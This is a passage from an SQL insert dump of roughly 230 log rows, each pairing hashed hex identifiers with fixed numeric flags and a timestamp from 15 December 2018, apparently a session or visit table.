(39163, '5414886ce8dbce91cc6073baced1b259', '30c2559ee3528720', 0, 2, 1, '2018-12-15 10:59:26'),
(39164, '5414886ce8dbce91cc6073baced1b259', '30c2559ee3528720', 0, 2, 1, '2018-12-15 10:59:31'),
(39165, 'bbf20fbcc3bef32932a2b7f7e79975ef', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 10:59:32'),
(39166, 'e6685bd48b2505c5fd8046933aa9790e', '1de090ec808c88cc', 0, 2, 1, '2018-12-15 11:00:16'),
(39167, '8d656dd9d05cbf447c48274abd1d14bb', '9bf4004ea004f2ae', 0, 2, 1, '2018-12-15 11:00:23'),
(39168, '1d3a8236591c966c8da464073e015bcb', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 11:00:29'),
(39169, '8b77315cbc417dc6937b01ba3d0e4b60', '6a4507b4da55ef6e', 0, 2, 1, '2018-12-15 11:00:40'),
(39170, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 11:01:02'),
(39171, '8d656dd9d05cbf447c48274abd1d14bb', '9bf4004ea004f2ae', 0, 2, 1, '2018-12-15 11:01:22'),
(39172, '8d656dd9d05cbf447c48274abd1d14bb', '9bf4004ea004f2ae', 0, 2, 1, '2018-12-15 11:01:31'),
(39173, '8f0986730cfd0c509bed282d8bfdd29f', '0f7815dc74d24cdd', 0, 2, 1, '2018-12-15 11:04:36'),
(39174, '8f0986730cfd0c509bed282d8bfdd29f', '0f7815dc74d24cdd', 0, 2, 1, '2018-12-15 11:04:48'),
(39175, 'd417e6c5162d7e88117fdaa1dc668383', 'b69c7b722abe1c22', 0, 2, 1, '2018-12-15 11:05:07'),
(39176, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 11:05:45'),
(39177, 'e47a9de4db28fce1231f907bd9181f2f', '2601d1527a8431dd', 0, 2, 1, '2018-12-15 11:05:48'),
(39178, 'e47a9de4db28fce1231f907bd9181f2f', '2601d1527a8431dd', 0, 2, 1, '2018-12-15 11:05:59'),
(39179, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 11:06:07'),
(39180, 'e47a9de4db28fce1231f907bd9181f2f', '2601d1527a8431dd', 0, 2, 1, '2018-12-15 11:06:15'),
(39181, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 11:07:00'),
(39182, 'd417e6c5162d7e88117fdaa1dc668383', 'b69c7b722abe1c22', 0, 2, 1, '2018-12-15 11:07:16'),
(39183, 'd417e6c5162d7e88117fdaa1dc668383', 'b69c7b722abe1c22', 0, 2, 1, '2018-12-15 11:07:39'),
(39184, 'd65e3e68fe9661025df8d64c5c61fb4f', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 11:09:58'),
(39185, 'd65e3e68fe9661025df8d64c5c61fb4f', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 11:11:07'),
(39186, '80f706d6918d4245e107eab9845f4a4c', '6d3dbeb30b283fc2', 0, 2, 1, '2018-12-15 11:12:16'),
(39187, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 11:12:34'),
(39188, '79c6d9799f01c47ae9c6410275b9022e', '74aba437eea39f30', 0, 2, 1, '2018-12-15 11:12:46'),
(39189, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 11:13:24'),
(39190, 'e6685bd48b2505c5fd8046933aa9790e', '1de090ec808c88cc', 0, 2, 1, '2018-12-15 11:13:28'),
(39191, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 11:14:06'),
(39192, '75783e86df960b570371edf98d9560b0', 'e3163f1046dc4449', 0, 2, 1, '2018-12-15 11:14:07'),
(39193, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 11:14:09'),
(39194, '4f9edf41d2f41df141a1754de25b3976', '034c56f60dcde8ab', 0, 2, 1, '2018-12-15 11:16:40'),
(39195, '17a0d3441a261ccaa49de4eaf530203e', 'cad202a09758cb3a', 0, 2, 1, '2018-12-15 11:16:59'),
(39196, '550012cfaa1efc050724d763ffd0fb88', '92a1885d904df329', 0, 2, 1, '2018-12-15 11:18:06'),
(39197, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 11:19:12'),
(39198, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 11:19:34'),
(39199, '80f706d6918d4245e107eab9845f4a4c', '6d3dbeb30b283fc2', 0, 2, 1, '2018-12-15 11:22:04'),
(39200, '17e20e205148fd1f41e962c1b59b367b', '61947c9a8914f8ee', 0, 2, 1, '2018-12-15 11:25:30'),
(39201, '70a55d4cbef6eed76dcb998b469b9d8f', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 11:25:39'),
(39202, '7e46c9b96e5e1e68ba51115cd991e3cc', '9234c34668bf2ded', 0, 2, 1, '2018-12-15 11:26:08'),
(39203, '17e20e205148fd1f41e962c1b59b367b', '61947c9a8914f8ee', 0, 2, 1, '2018-12-15 11:26:10'),
(39204, '1d3a8236591c966c8da464073e015bcb', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 11:26:44'),
(39205, '550012cfaa1efc050724d763ffd0fb88', '92a1885d904df329', 0, 2, 1, '2018-12-15 11:27:47'),
(39206, '55d52f60a2db3acaaa2e0686572e9722', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 11:27:55'),
(39207, '55d52f60a2db3acaaa2e0686572e9722', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 11:28:32'),
(39208, 'aee3ae70778d5f86bbca277ec114b16c', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-15 11:29:21'),
(39209, '30e9fd4f2d0f7a6cf6f6d4c0390deab0', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 11:29:36'),
(39210, '17e20e205148fd1f41e962c1b59b367b', '61947c9a8914f8ee', 0, 2, 1, '2018-12-15 11:29:53'),
(39211, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-15 11:31:01'),
(39212, '4f92967ffddf29d67385c1596172e01a', '82518081da3eda31', 0, 2, 1, '2018-12-15 11:31:25'),
(39213, '5deaf0a62fa84b50872035c1930c0993', '618a8dda34a6c476', 0, 2, 1, '2018-12-15 11:31:35'),
(39214, 'b1ee7b7a962b8ad9ef17ba0c5004e1e5', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-15 11:31:49'),
(39215, '4f92967ffddf29d67385c1596172e01a', '82518081da3eda31', 0, 2, 1, '2018-12-15 11:32:06'),
(39216, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 11:32:37'),
(39217, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 11:33:48'),
(39218, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 11:34:12'),
(39219, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 11:34:39'),
(39220, '4f92967ffddf29d67385c1596172e01a', '82518081da3eda31', 0, 2, 1, '2018-12-15 11:34:58'),
(39221, '55e898dab1012ce063ec3032fa5ead7c', 'bb82fe251b1b0c6d', 0, 2, 1, '2018-12-15 11:35:10'),
(39222, '89fb777fa979bb1c7b1d2c728a9da8fc', '9968c5be4a7971a2', 0, 2, 1, '2018-12-15 11:37:41'),
(39223, '5414886ce8dbce91cc6073baced1b259', '30c2559ee3528720', 0, 2, 1, '2018-12-15 11:39:43'),
(39224, '89fb777fa979bb1c7b1d2c728a9da8fc', '9968c5be4a7971a2', 0, 2, 1, '2018-12-15 11:40:52'),
(39225, '55e898dab1012ce063ec3032fa5ead7c', 'bb82fe251b1b0c6d', 0, 2, 1, '2018-12-15 11:41:10'),
(39226, '1f4bfabdea52bcd689e804ff84db2d81', 'f0acfd322bd087e3', 0, 2, 1, '2018-12-15 11:41:22'),
(39227, 'c300031d5459bce56a4aded6874f65d3', '4d1f6f1ea694ba1c', 0, 2, 1, '2018-12-15 11:41:55'),
(39228, '7edabaeda129c271cd73ef0551125e57', '196ae7616c94df27', 0, 2, 1, '2018-12-15 11:43:10'),
(39229, '5871af26661f2d5345f8e4104619de23', 'ac5f99c20e27d1aa', 0, 2, 1, '2018-12-15 11:43:36'),
(39230, 'c32e2d7018cb8afc4815bb8769717304', 'c82195f7827b9487', 0, 2, 1, '2018-12-15 11:46:32'),
(39231, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 11:47:16'),
(39232, 'd5a09c81c57fc55f6b05e18cb2526b14', '6a4507b4da55ef6e', 0, 2, 1, '2018-12-15 11:47:17'),
(39233, '72b568d266c7b7eb4997120c8828d27d', 'f79c305446c2d784', 0, 2, 1, '2018-12-15 11:51:38'),
(39234, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 11:51:50'),
(39235, '72b568d266c7b7eb4997120c8828d27d', 'f79c305446c2d784', 0, 2, 1, '2018-12-15 11:52:18'),
(39236, '72b568d266c7b7eb4997120c8828d27d', 'f79c305446c2d784', 0, 2, 1, '2018-12-15 11:52:36'),
(39237, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 11:55:50'),
(39238, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 11:58:18'),
(39239, '70a55d4cbef6eed76dcb998b469b9d8f', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 11:59:18'),
(39240, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-15 11:59:22'),
(39241, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 11:59:30'),
(39242, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 11:59:57'),
(39243, '8e86fd720fb0cead8e9a40fc04b8c7e5', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-15 12:00:45'),
(39244, '7b6ef4ba7b0dc274a46f52c9ca763f21', 'cad202a09758cb3a', 0, 2, 1, '2018-12-15 12:01:02'),
(39245, 'f657c501d331d328563f2275f26a100e', 'd77b877cb3115aa7', 0, 2, 1, '2018-12-15 12:01:23'),
(39246, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 12:01:45'),
(39247, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 12:01:53'),
(39248, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 12:02:00'),
(39249, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 12:02:27'),
(39250, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 12:02:40'),
(39251, '7e46c9b96e5e1e68ba51115cd991e3cc', '9234c34668bf2ded', 0, 2, 1, '2018-12-15 12:02:41'),
(39252, '47c4f17e3ff94c395a8c6c8fc4357728', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-15 12:04:45'),
(39253, '47c4f17e3ff94c395a8c6c8fc4357728', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-15 12:04:58'),
(39254, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 12:05:32'),
(39255, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 12:05:56'),
(39256, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-15 12:06:11'),
(39257, '5414886ce8dbce91cc6073baced1b259', '30c2559ee3528720', 0, 2, 1, '2018-12-15 12:07:14'),
(39258, 'd82b4c6bf743b58350e374345c47ff02', '624d6937076d1188', 0, 2, 1, '2018-12-15 12:09:28'),
(39259, '58ab623a3ad7c9d35612a67c0a7bf4d0', '91d21119de46096c', 0, 2, 1, '2018-12-15 12:09:30'),
(39260, '58ab623a3ad7c9d35612a67c0a7bf4d0', '91d21119de46096c', 0, 2, 1, '2018-12-15 12:09:41'),
(39261, '58ab623a3ad7c9d35612a67c0a7bf4d0', '91d21119de46096c', 0, 2, 1, '2018-12-15 12:10:00'),
(39262, 'ee3ecb91fc25d6005e3f15eb995fa93a', 'fad7ef00226341cb', 0, 2, 1, '2018-12-15 12:13:55'),
(39263, 'd82b4c6bf743b58350e374345c47ff02', '624d6937076d1188', 0, 2, 1, '2018-12-15 12:14:06'),
(39264, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 12:14:57'),
(39265, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 12:15:21'),
(39266, 'c86387f24dc70c4e2b48110e813c7b10', '7030f2d754282ace', 0, 2, 1, '2018-12-15 12:15:28'),
(39267, 'ee3ecb91fc25d6005e3f15eb995fa93a', 'fad7ef00226341cb', 0, 2, 1, '2018-12-15 12:15:36'),
(39268, '81a2e4da6d4ca940b59bde07f2cc93fe', '6a4507b4da55ef6e', 0, 2, 1, '2018-12-15 12:16:37'),
(39269, '27574256c198316cf0f119544034dbf5', '6fcc78cf73176de7', 0, 2, 1, '2018-12-15 12:17:01'),
(39270, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 12:17:28'),
(39271, '27574256c198316cf0f119544034dbf5', '6fcc78cf73176de7', 0, 2, 1, '2018-12-15 12:17:34'),
(39272, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 12:18:06'),
(39273, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 12:18:11'),
(39274, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 12:18:14'),
(39275, '27574256c198316cf0f119544034dbf5', '6fcc78cf73176de7', 0, 2, 1, '2018-12-15 12:18:22'),
(39276, 'f811af0e36330c8f4de921d0a3439c69', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:18:26'),
(39277, 'f811af0e36330c8f4de921d0a3439c69', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:18:37'),
(39278, '3ba6467d17fe8b3d897cf37c971b57a8', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-15 12:19:04'),
(39279, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-15 12:19:26'),
(39280, 'f811af0e36330c8f4de921d0a3439c69', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:20:16'),
(39281, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 12:20:18'),
(39282, '5254c001967e33a6a4830a301325f85f', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:20:24'),
(39283, '5254c001967e33a6a4830a301325f85f', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:20:34'),
(39284, '5254c001967e33a6a4830a301325f85f', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:20:52'),
(39285, '5254c001967e33a6a4830a301325f85f', '22f43a16a511f701', 0, 2, 1, '2018-12-15 12:21:03'),
(39286, '27574256c198316cf0f119544034dbf5', '6fcc78cf73176de7', 0, 2, 1, '2018-12-15 12:21:50'),
(39287, '53d422b56cd3aca0588a7bd55e920b62', '545676bcbb496ec1', 0, 2, 1, '2018-12-15 12:23:00'),
(39288, 'f7351f4bddeb3fd837c2a799bf9fd252', '4902bd1eaee91f65', 0, 2, 1, '2018-12-15 12:23:08'),
(39289, '70a55d4cbef6eed76dcb998b469b9d8f', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 12:23:22'),
(39290, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 12:25:08'),
(39291, 'd3091db5f4183a6fd09334349c89f479', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-15 12:25:13'),
(39292, '70a55d4cbef6eed76dcb998b469b9d8f', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-15 12:25:40'),
(39293, '27dbc7f0c890fb669a3f624be20a486c', '553b9f0a18b97af8', 0, 2, 1, '2018-12-15 12:26:23'),
(39294, 'd41fb081f270e533ab7d2eabf1ef42a2', 'f48f21345f609603', 0, 2, 1, '2018-12-15 12:27:23'),
(39295, '47c4f17e3ff94c395a8c6c8fc4357728', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-15 12:27:57'),
(39296, '47c4f17e3ff94c395a8c6c8fc4357728', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-15 12:28:06'),
(39297, 'f657c501d331d328563f2275f26a100e', 'd77b877cb3115aa7', 0, 2, 1, '2018-12-15 12:28:11'),
(39298, 'f657c501d331d328563f2275f26a100e', 'd77b877cb3115aa7', 0, 2, 1, '2018-12-15 12:28:26'),
(39299, '47c4f17e3ff94c395a8c6c8fc4357728', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-15 12:29:03'),
(39300, 'd3091db5f4183a6fd09334349c89f479', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-15 12:32:09'),
(39301, '27574256c198316cf0f119544034dbf5', '6fcc78cf73176de7', 0, 2, 1, '2018-12-15 12:32:44'),
(39302, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 12:33:10'),
(39303, 'b1ff8a07fd89ce497750aa250c6b2146', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 12:39:28'),
(39304, '4e383689315fb5637bbfdf014b8d3108', 'fc290d8bf25d1be0', 0, 2, 1, '2018-12-15 12:42:56'),
(39305, 'a5876c10ebe9012b1f651c34f323d99c', '8e3d2fb4e1f26b02', 0, 2, 1, '2018-12-15 12:43:13'),
(39306, 'b1ff8a07fd89ce497750aa250c6b2146', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-15 12:45:11'),
(39307, '3ba6467d17fe8b3d897cf37c971b57a8', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-15 12:51:17'),
(39308, 'aafab1a16ead060db90e75419576f401', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-15 12:52:55'),
(39309, 'aafab1a16ead060db90e75419576f401', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-15 12:53:36'),
(39310, 'aafab1a16ead060db90e75419576f401', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-15 12:53:41'),
(39311, '56bb1c3fa3431dfb422b077f2b983259', '95e387d810fd5cc4', 0, 2, 1, '2018-12-15 12:53:49'),
(39312, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 12:58:23'),
(39313, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 12:58:29'),
(39314, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-15 12:58:46'),
(39315, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:02:08'),
(39316, 'c245ad455bf702d164c69622695b85dd', '407f5dc75c6f4a5d', 0, 2, 1, '2018-12-15 13:02:53'),
(39317, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:03:07'),
(39318, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:03:33'),
(39319, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:03:39'),
(39320, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 13:06:06'),
(39321, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 13:13:43'),
(39322, '3ba6467d17fe8b3d897cf37c971b57a8', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-15 13:13:58'),
(39323, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 13:15:18'),
(39324, '95e0fb06e7153a44ea0c430dc0f68701', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 13:15:32'),
(39325, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-15 13:15:42'),
(39326, '95e0fb06e7153a44ea0c430dc0f68701', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 13:16:06'),
(39327, '95e0fb06e7153a44ea0c430dc0f68701', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 13:16:55'),
(39328, '27dbc7f0c890fb669a3f624be20a486c', '553b9f0a18b97af8', 0, 2, 1, '2018-12-15 13:17:02'),
(39329, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 13:17:08'),
(39330, '75e7e25e4856333317abb532ebda829b', '3fdb63a2b57cd09e', 0, 2, 1, '2018-12-15 13:20:58'),
(39331, '7e46c9b96e5e1e68ba51115cd991e3cc', '9234c34668bf2ded', 0, 2, 1, '2018-12-15 13:21:56'),
(39332, '75e7e25e4856333317abb532ebda829b', '3fdb63a2b57cd09e', 0, 2, 1, '2018-12-15 13:22:50'),
(39333, 'bdd1957476245155477f235fc7c33ab0', '9234c34668bf2ded', 0, 2, 1, '2018-12-15 13:23:20'),
(39334, '5738cfb31b745b122214881a1659fd93', '3e53f700064aedd2', 0, 2, 1, '2018-12-15 13:23:24'),
(39335, 'd60784fd0b759b40e9015b1355126f58', '12fc4b801e5257e8', 0, 2, 1, '2018-12-15 13:23:49'),
(39336, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:24:07'),
(39337, '8a28c9cdbc7f51d101b2c01cb77ad54e', '4e17d33b917a4da7', 0, 2, 1, '2018-12-15 13:24:15'),
(39338, '86e8304593ca94f75f2afad3058b3d75', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-15 13:25:49'),
(39339, '62e8e2e7d4c3b0810c2445af80b5b252', '65e1b73cf3be5c3f', 0, 2, 1, '2018-12-15 13:27:23'),
(39340, '94f0a3b8738756159d4a8ef4bbf5adfb', '17d6d66d7107d8b1', 0, 2, 1, '2018-12-15 13:27:53'),
(39341, 'a976306d921b65eb57cffebf0fcb68c1', 'c5b9fd5b72abf8c4', 0, 2, 1, '2018-12-15 13:28:40'),
(39342, 'd42b22ce028164cf714b66dadc22af7a', 'c5b42dbb0bb6215a', 0, 2, 1, '2018-12-15 13:28:54'),
(39343, '9a2d984c54ee869d185cce746fc318c7', 'f8f101495173843a', 0, 2, 1, '2018-12-15 13:29:16'),
(39344, '9a2d984c54ee869d185cce746fc318c7', 'f8f101495173843a', 0, 2, 1, '2018-12-15 13:29:28'),
(39345, 'a976306d921b65eb57cffebf0fcb68c1', 'c5b9fd5b72abf8c4', 0, 2, 1, '2018-12-15 13:30:11'),
(39346, '2967e4ae2e8c89e26422677d5951c2c2', '618a8dda34a6c476', 0, 2, 1, '2018-12-15 13:30:51'),
(39347, '95e0fb06e7153a44ea0c430dc0f68701', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 13:31:03'),
(39348, '95e0fb06e7153a44ea0c430dc0f68701', 'df673342c2c2d34b', 0, 2, 1, '2018-12-15 13:31:15'),
(39349, 'a976306d921b65eb57cffebf0fcb68c1', 'c5b9fd5b72abf8c4', 0, 2, 1, '2018-12-15 13:31:53'),
(39350, 'a976306d921b65eb57cffebf0fcb68c1', 'c5b9fd5b72abf8c4', 0, 2, 1, '2018-12-15 13:32:13'),
(39351, '1002144ba852edcb7f34f46e019be013', 'e6d9961c68fd88c9', 0, 2, 1, '2018-12-15 13:36:22'),
(39352, 'c32e2d7018cb8afc4815bb8769717304', 'c82195f7827b9487', 0, 2, 1, '2018-12-15 13:40:45'),
(39353, '221d8edf6423341e657261ccbb274260', '8d96482d446e2629', 0, 2, 1, '2018-12-15 13:41:30'),
(39354, '221d8edf6423341e657261ccbb274260', '8d96482d446e2629', 0, 2, 1, '2018-12-15 13:41:37'),
(39355, '5a84aeaab5d47e44369fed4d35cf2e3f', '46713cac27a94b83', 0, 2, 1, '2018-12-15 13:41:40'),
(39356, '91317c88fb6ed203b92aa2fe6dcbbfa3', '4a7924dd4418962c', 0, 2, 1, '2018-12-15 13:55:47'),
(39357, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 14:01:27'),
(39358, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:03:23'),
(39359, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:03:25'),
(39360, '8490fb83bc915dadde12f3c1712ef518', 'fad7ef00226341cb', 0, 2, 1, '2018-12-15 14:04:04'),
(39361, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:05:21'),
(39362, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:07:19'),
(39363, '9225e9e17332cecf966e678b66841d78', 'b603708ce5ac82cb', 0, 2, 1, '2018-12-15 14:13:38'),
(39364, '0f4f07f3edd178ae67d9892df7c3f900', '36146e1f6045b395', 0, 2, 1, '2018-12-15 14:14:47'),
(39365, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:15:32'),
(39366, '0f4f07f3edd178ae67d9892df7c3f900', '36146e1f6045b395', 0, 2, 1, '2018-12-15 14:15:42'),
(39367, '0f4f07f3edd178ae67d9892df7c3f900', '36146e1f6045b395', 0, 2, 1, '2018-12-15 14:16:16'),
(39368, '0f4f07f3edd178ae67d9892df7c3f900', '36146e1f6045b395', 0, 2, 1, '2018-12-15 14:16:55'),
(39369, 'afe4ddfc6bc17d24ecbce0e6056f8e7f', 'e17d8b27cf8011f9', 0, 2, 1, '2018-12-15 14:17:05'),
(39370, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:18:04'),
(39371, '1002144ba852edcb7f34f46e019be013', 'e6d9961c68fd88c9', 0, 2, 1, '2018-12-15 14:18:16'),
(39372, 'afe4ddfc6bc17d24ecbce0e6056f8e7f', 'e17d8b27cf8011f9', 0, 2, 1, '2018-12-15 14:19:07'),
(39373, 'd759f8cdbcccfc10d38b375de98ff879', '3bd36d6429a9f245', 0, 2, 1, '2018-12-15 14:21:06'),
(39374, '7ec7def7db0fe8fc8b487e65190d95a9', '4727f9281a8da559', 0, 2, 1, '2018-12-15 14:21:30'),
(39375, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:22:17'),
(39376, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:23:02'),
(39377, '741027c0eae53603914247f0d59768f4', '3233431a244017cd', 0, 2, 1, '2018-12-15 14:27:42'),
(39378, '741027c0eae53603914247f0d59768f4', '3233431a244017cd', 0, 2, 1, '2018-12-15 14:28:06'),
(39379, '741027c0eae53603914247f0d59768f4', '3233431a244017cd', 0, 2, 1, '2018-12-15 14:28:31'),
(39380, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:28:42'),
(39381, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:28:52'),
(39382, 'd55111fe133a7510110f183788d974c6', '8ad007cf09224cd8', 0, 2, 1, '2018-12-15 14:29:12'),
(39383, '441bef9d9191214b4ffa5a4e57250038', '6e117bd555667400', 0, 2, 1, '2018-12-15 14:30:18'),
(39384, '441bef9d9191214b4ffa5a4e57250038', '6e117bd555667400', 0, 2, 1, '2018-12-15 14:31:10'),
(39385, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 14:31:15'),
(39386, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 14:33:16'),
(39387, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-15 14:37:30'),
(39388, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-15 14:37:38'),
(39389, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-15 14:37:47'),
(39390, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-15 14:37:57'),
(39391, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 14:50:28'),
